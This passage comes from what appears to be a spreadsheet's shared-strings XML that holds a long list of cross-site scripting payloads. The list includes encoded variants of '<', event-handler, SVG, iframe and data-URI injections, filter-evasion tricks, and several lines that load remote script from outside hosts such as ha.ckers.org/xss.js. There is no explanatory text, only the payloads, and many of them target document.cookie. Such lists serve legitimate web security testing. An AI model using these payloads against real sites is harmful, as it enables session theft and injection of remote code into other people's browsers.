    <t>%3C</t>
  </si>
  <si>
    <t>&amp;lt</t>
  </si>
  <si>
    <t>&amp;LT</t>
  </si>
  <si>
    <t>&amp;LT;</t>
  </si>
  <si>
    <t>&amp;#60</t>
  </si>
  <si>
    <t>&amp;#060</t>
  </si>
  <si>
    <t>&amp;#0060</t>
  </si>
  <si>
    <t>&amp;#00060</t>
  </si>
  <si>
    <t>&amp;#000060</t>
  </si>
  <si>
    <t>&amp;#0000060</t>
  </si>
  <si>
    <t>&amp;#x3c</t>
  </si>
  <si>
    <t>&amp;#x03c</t>
  </si>
  <si>
    <t>&amp;#x003c</t>
  </si>
  <si>
    <t>&amp;#x0003c</t>
  </si>
  <si>
    <t>&amp;#x00003c</t>
  </si>
  <si>
    <t>&amp;#x000003c</t>
  </si>
  <si>
    <t>&amp;#x3c;</t>
  </si>
  <si>
    <t>&amp;#x03c;</t>
  </si>
  <si>
    <t>&amp;#x003c;</t>
  </si>
  <si>
    <t>&amp;#x0003c;</t>
  </si>
  <si>
    <t>&amp;#x00003c;</t>
  </si>
  <si>
    <t>&amp;#x000003c;</t>
  </si>
  <si>
    <t>&amp;#X3c</t>
  </si>
  <si>
    <t>&amp;#X03c</t>
  </si>
  <si>
    <t>&amp;#X003c</t>
  </si>
  <si>
    <t>&amp;#X0003c</t>
  </si>
  <si>
    <t>&amp;#X00003c</t>
  </si>
  <si>
    <t>&amp;#X000003c</t>
  </si>
  <si>
    <t>&amp;#X3c;</t>
  </si>
  <si>
    <t>&amp;#X03c;</t>
  </si>
  <si>
    <t>&amp;#X003c;</t>
  </si>
  <si>
    <t>&amp;#X0003c;</t>
  </si>
  <si>
    <t>&amp;#X00003c;</t>
  </si>
  <si>
    <t>&amp;#X000003c;</t>
  </si>
  <si>
    <t>&amp;#x3C</t>
  </si>
  <si>
    <t>&amp;#x03C</t>
  </si>
  <si>
    <t>&amp;#x003C</t>
  </si>
  <si>
    <t>&amp;#x0003C</t>
  </si>
  <si>
    <t>&amp;#x00003C</t>
  </si>
  <si>
    <t>&amp;#x000003C</t>
  </si>
  <si>
    <t>&amp;#x3C;</t>
  </si>
  <si>
    <t>&amp;#x03C;</t>
  </si>
  <si>
    <t>&amp;#x003C;</t>
  </si>
  <si>
    <t>&amp;#x0003C;</t>
  </si>
  <si>
    <t>&amp;#x00003C;</t>
  </si>
  <si>
    <t>&amp;#x000003C;</t>
  </si>
  <si>
    <t>&amp;#X3C</t>
  </si>
  <si>
    <t>&amp;#X03C</t>
  </si>
  <si>
    <t>&amp;#X003C</t>
  </si>
  <si>
    <t>&amp;#X0003C</t>
  </si>
  <si>
    <t>&amp;#X00003C</t>
  </si>
  <si>
    <t>&amp;#X000003C</t>
  </si>
  <si>
    <t>&amp;#X3C;</t>
  </si>
  <si>
    <t>&amp;#X03C;</t>
  </si>
  <si>
    <t>&amp;#X003C;</t>
  </si>
  <si>
    <t>&amp;#X0003C;</t>
  </si>
  <si>
    <t>&amp;#X00003C;</t>
  </si>
  <si>
    <t>&amp;#X000003C;</t>
  </si>
  <si>
    <t>\x3c</t>
  </si>
  <si>
    <t>\x3C</t>
  </si>
  <si>
    <t>\u003c</t>
  </si>
  <si>
    <t>\u003C</t>
  </si>
  <si>
    <t>&amp;lt;iframe src=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"javascript&amp;#058;alert('XSS')\"</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=//ha&amp;#46;ckers&amp;#46;org/&amp;#46;js&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js?&amp;lt;B&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");//&amp;lt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT/SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY onload!#$%&amp;()*~+-_&amp;#46;,&amp;#58;;?@&amp;#91;/|\&amp;#93;^`=alert(\"XSS\")&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT/XSS SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"   javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>perl -e 'print \"&amp;lt;SCR\0IPT&amp;gt;alert(\\"XSS\\")&amp;lt;/SCR\0IPT&amp;gt;\";' &amp;gt; out</t>
  </si>
  <si>
    <t>perl -e 'print \"&amp;lt;IMG SRC=java\0script&amp;#058;alert(\\"XSS\\")&amp;gt;\";' &amp;gt; out</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"jav&amp;#x0D;ascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"jav&amp;#x0A;ascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"jav&amp;#x09;ascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript&amp;#058;alert('XSS')&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript&amp;#058;alert(String&amp;#46;fromCharCode(88,83,83))&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG \"\"\"&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=`javascript&amp;#058;alert(\"RSnake says, 'XSS'\")`&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=javascript&amp;#058;alert(&amp;quot;XSS&amp;quot;)&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=JaVaScRiPt&amp;#058;alert('XSS')&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>';!--\"&amp;lt;XSS&amp;gt;=&amp;{()}</t>
  </si>
  <si>
    <t>;alert(String&amp;#46;fromCharCode(88,83,83))//\';alert(String&amp;#46;fromCharCode(88,83,83))//\";alert(String&amp;#46;fromCharCode(88,83,83))//\\";alert(String&amp;#46;fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String&amp;#46;fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascrscriptipt:alert('XSS')&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert("XSS"))'&gt;</t>
  </si>
  <si>
    <t>&lt;EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;</t>
  </si>
  <si>
    <t>a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);</t>
  </si>
  <si>
    <t>&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>&lt;form id="test" /&gt;&lt;button form="test" formaction="javascript:alert(123)"&gt;TESTHTML5FORMACTION</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;crosssitespt</t>
  </si>
  <si>
    <t>&lt;frameset onload=alert(123)&gt;</t>
  </si>
  <si>
    <t>&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(123)//"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(123)//"&gt;</t>
  </si>
  <si>
    <t>&lt;object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;</t>
  </si>
  <si>
    <t>&lt;embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;({0:#0=alert/#0#/#0#(123)})&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script src="#"&gt;{alert(1)}&lt;/script&gt;;1</t>
  </si>
  <si>
    <t>&lt;script&gt;crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;svg xmlns="#"&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;svg onload="javascript:alert(123)" xmlns="#"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;iframe xmlns="#" src="javascript:alert(1)"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-</t>
  </si>
  <si>
    <t>%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-</t>
  </si>
  <si>
    <t>%253cscript%253ealert(document.cookie)%253c/script%253e</t>
  </si>
  <si>
    <t>“&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>“&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>foo&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;</t>
  </si>
  <si>
    <t>%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E</t>
  </si>
  <si>
    <t>‘; alert(document.cookie); var foo=’</t>
  </si>
  <si>
    <t>foo\’; alert(document.cookie);//’;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img src=asdf onerror=alert(document.cookie)&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert(’XSS’)&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;/script&gt;&lt;video src=1 onerror=alert(1)&gt;&lt;audio src=1 onerror=alert(1)&gt;';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>0\"autofocus/onfocus=alert(1)--&gt;&lt;video/poster/onerror=prompt(2)&gt;"-confirm(3)-"</t>
  </si>
  <si>
    <t>&lt;script/src=data:,alert()&gt;</t>
  </si>
  <si>
    <t>&lt;marquee/onstart=alert()&gt;</t>
  </si>
  <si>
    <t>&lt;video/poster/onerror=alert()&gt;</t>
  </si>
  <si>
    <t>&lt;isindex/autofocus/onfocus=alert()&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;</t>
  </si>
  <si>
    <t>&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;</t>
  </si>
  <si>
    <t>#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;</t>
  </si>
  <si>
    <t>exp/*&lt;A STYLE='no\xss:noxss("*//*");</t>
  </si>
  <si>
    <t>xss:ex/*XSS*//*/*/pression(alert("XSS"))'&gt;</t>
  </si>
  <si>
    <t>&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;</t>
  </si>
  <si>
    <t>0\"autofocus/onfocus=alert(1)--&gt;&lt;video/poster/ error=prompt(2)&gt;"-confirm(3)-"</t>
  </si>
  <si>
    <t>veris--&gt;group&lt;svg/onload=alert(/XSS/)//</t>
  </si>
  <si>
    <t>#"&gt;&lt;img src=M onerror=alert('XSS');&gt;</t>
  </si>
  <si>
    <t>element[attribute='&lt;img src=x onerror=alert('XSS');&gt;</t>
  </si>
  <si>
    <t>[&lt;blockquote cite="]"&gt;[" onmouseover="alert('RVRSH3LL_XSS');" ]</t>
  </si>
  <si>
    <t>%22;alert%28%27RVRSH3LL_XSS%29//</t>
  </si>
  <si>
    <t>javascript:alert%281%29;</t>
  </si>
  <si>
    <t>&lt;w contenteditable id=x onfocus=alert()&gt;</t>
  </si>
  <si>
    <t>alert;pg("XSS")</t>
  </si>
  <si>
    <t>&lt;svg/onload=%26%23097lert%26lpar;1337)&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;for((i)in(self))eval(i)(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;</t>
  </si>
  <si>
    <t>&lt;sCR&lt;script&gt;iPt&gt;alert(1)&lt;/SCr&lt;/script&gt;IPt&gt;</t>
  </si>
  <si>
    <t>&lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";</t>
  </si>
  <si>
    <t>&lt;INPUT TYPE="BUTTON" action="alert('XSS')"/&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;h1&gt;&lt;IFRAME SRC=javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;"&gt;123&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;h1&gt;&lt;IFRAME SRC=# onmouseover=alert(document.cookie)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;/iframe&gt;&lt;script&gt;alert(`TEXT YOU WANT TO BE DISPLAYED`);&lt;/script&gt;&lt;iframe frameborder=0%EF%BB%BF</t>
  </si>
  <si>
    <t>&gt;&lt;h1&gt;&lt;IFRAME width=420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt;123&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;h1&gt;&lt;iframe width=420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;123&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;h1&gt;&lt;IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr</t>
  </si>
  <si>
    <t>g'"&gt;&lt;/IFRAME&gt;Hover the cursor to the LEFT of this Message&lt;/h1&gt;&amp;ParamHeight=250</t>
  </si>
  <si>
    <t>&lt;IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"&gt;&lt;/IFRAME&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src=http://xss.rocks/scriptlet.html &lt;</t>
  </si>
  <si>
    <t>&lt;iframe  src="&amp;Tab;javascript:prompt(1)&amp;Tab;"&gt;</t>
  </si>
  <si>
    <t>&lt;sVg&gt;&lt;scRipt &gt;alert&amp;lpar;1&amp;rpar; {Opera}</t>
  </si>
  <si>
    <t>&lt;img/src=`` onerror=this.onerror=confirm(1)</t>
  </si>
  <si>
    <t>&lt;img src=``&amp;NewLine; onerror=alert(1)&amp;NewLine;</t>
  </si>
  <si>
    <t>&lt;script /**/&gt;/**/alert(1)/**/&lt;/script /**/</t>
  </si>
  <si>
    <t>&amp;#34;&amp;#62;&lt;h1/onmouseover='\u0061lert(1)'&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open('https://www.google.com/') &lt;/script</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;a href="javascript:\u0061lert&amp;#x28;1&amp;#x29;"&gt;X&lt;/script&gt;&lt;img/*/src="worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;"/*/onerror='eval(src)'&gt;</t>
  </si>
  <si>
    <t>&lt;iframe// src=javaSCRIPT&amp;colon;alert(1)</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert(1)&gt;&gt;&lt;img src=x onerror=javascript:alert('1')&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert(1")&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert(`1`)&gt;&gt;&lt;img src=x onerror=javascript:alert(('1'))&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert((1"))&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert((`1`))&gt;&gt;&lt;img src=x onerror=javascript:alert(A)&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert((A))&gt;&gt;&lt;img src=x onerror=javascript:alert(('A'))&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert('A')&gt;&gt;&lt;img src=x onerror=javascript:alert(("A"))&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert(A")&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=javascript:alert((`A`))&gt;&gt;&lt;img src=x onerror=javascript:alert(`A`)&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav ascript:javascript:alert(1);"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav ascript:alert('XSS');"&gt;</t>
  </si>
  <si>
